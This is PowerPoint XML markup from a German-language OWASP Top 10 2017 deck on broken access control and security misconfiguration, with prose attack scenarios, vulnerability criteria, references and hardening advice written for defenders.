                        <a:t>Technisch</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" baseline="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0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Es gehört zu den Kernfähigkeiten von Angreifern, Zugangskontrollen zu um-gehen. Während </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> und </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> fehlende Zugangskontrollen </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>erken-nen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, können sie nicht prüfen, ob </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>vorhandene Kontrollen korrekt funktionieren. Dies kann manuell erkannt werden; in manchen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Frame-works sind fehlende</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Zugangskontrol-len</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> automatisiert erkennbar.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="105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de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Auf Grund fehlender automatisierter Erkennung bzw. fehlender Funktionstests in der Entwicklung sind Schwachstellen bei der Zugriffskontrolle häufig.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Generell sind statische oder dynamische Tests nicht für die Erkennung von Zugangskontrollen geeignet. Manuelles Testen ist der beste Weg, um fehlende oder ineffektive Zugriffskontrollen zu erkennen, einschließlich HTTP-Methoden (GET vs. PUT etc.), Controller, direkte Objektreferenzen etc.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="105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de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Als technische Auswirkungen können Angreifer als andere Benutzer oder Administratoren agieren, bzw. können Angreifer privilegierte Funktionen nutzen, Datensätze erstellen, aufrufen, aktualisieren oder löschen.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Die Auswirkungen auf das Unter-nehmen hängen vom Schutzbedarf der Anwendung und ihrer Daten ab.</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Mögliche Angriffsszenarien</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pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Der Anwendungsserver wird in der Produktion mit Beispielanwendungen installiert. Diese enthalten bekannte Sicherheitslücken, die Angreifer ausnutzen könnten um den Server zu kompromittieren. Im Fall einer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Adminkonsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> könnten unveränderte Standardpasswörter zu einer Übernahme durch einen Angreifer führen. </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pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Directory Listings wurden auf dem Server nicht deaktiviert. Ein Angreifer findet in einer Verzeichnisliste die kompilierten </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Javaklassen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> und lädt diese herunter zur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dekom-pilierung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> und Reverse Engineering des Codes, um diesen lesen zu können. Der Angreifer findet ernste Schwachstellen in der Zugriffskontrolle der Anwendung. </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pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Die Konfiguration des Anwendungsserver ermöglicht detaillierte Fehlermeldungen, z.B. Stack-Traces an den Nutzer. Dies enthüllt möglicherweise sensitive Informationen oder grund-legende Fehler wie verwundbare Versionen von Komponenten.</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pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Ein Cloud-Dienst enthält Standardfreigaben, die aus dem Internet für andere Cloud-Nutzer erreichbar sind und ermöglicht dadurch Zugriff auf sensitive Daten in der Cloud.</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Ist die Anwendung verwundbar?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Die Anwendung könnte in folgenden Fällen verwundbar sein :</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Mangelhafte Sicherheitshärtung des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anwendungsstacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> oder ungeeignet konfigurierte Berechtigungen von </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Clouddiensten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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Nicht benötigte Features sind aktiviert oder installiert (z.B. unnötige Ports, Dienste, Seiten, Nutzer oder Rechte).</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Standardnutzer und -passwörter sind aktiviert, bzw. unverändert. </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Die Fehlerbehandlung gibt Stack-Traces oder andere interne technische Fehlermeldungen an den Nutzer preis.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Für aktualisierte Systeme sind die neuesten Sicherheits-features deaktiviert oder nicht sicher konfiguriert.</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Die Sicherheitseinstellungen in den Anwendungsservern und</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-frameworks (z.B. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Spring, ASP.NET), Bibliotheken, Datenbanken etc. sind nicht auf sichere Werte gesetzt.</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Der Server sendet keine Sicherheits-Header oder -Direktiven, bzw. diese sind nicht sicher konfiguriert.</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Die Software ist veraltet oder verwundbar (siehe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A9:2017-Nutzung von Komponenten mit bekannten Schwachstellen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ohne einen abgestimmten und reproduzierbaren Prozess sind Systeme einem höheren Risiko ausgesetzt!</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Referenzen</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1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId5"/>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6"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Configuration Management</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Testing Guide: Testing for Error Codes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Security Headers Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Weitere Informationen unter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9"/>
              </a:rPr>
              <a:t>Application Security Verification Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> V19 Configuration.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1"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endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Andere</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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NIST Guide to General Server Hardening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1"/>
              </a:rPr>
              <a:t>CWE-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Environmental Security Flaws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CWE-16: Configuration</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CWE-388: Error Handling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CIS Security Configuration Guides/Benchmarks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Amazon S3 Bucket Discovery and Enumeration</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Wie kann ich das verhindern?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sichere Installationsprozesse sind zu implementieren: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Ein wiederholbarer Härtungsprozess, der eine schnelle und einfache Verteilung einer neuen, abgesicherten Umgebung erlaubt. Entwicklungs-, QA- und Produktionsumgebungen sollten identisch konfiguriert sein, mit unterschiedlichen Passwörtern je Umgebung. Der Prozess sollte automatisiert sein, um den nötigen Aufwand bei Erstellung einer neuen, sicheren Umgebung zu minimieren.</a:t>
            </a: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Eine Minimalplattform ohne unnötige Features, Komponenten, Dokumentation und Beispiele. Entferne, bzw. Vermeide die Installation nicht benötigter Features und Frameworks.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Review und Update der Konfigurationen entsprechend aller Sicherheitshinweise, Updates und Patches als Teil des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>präven-tiven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
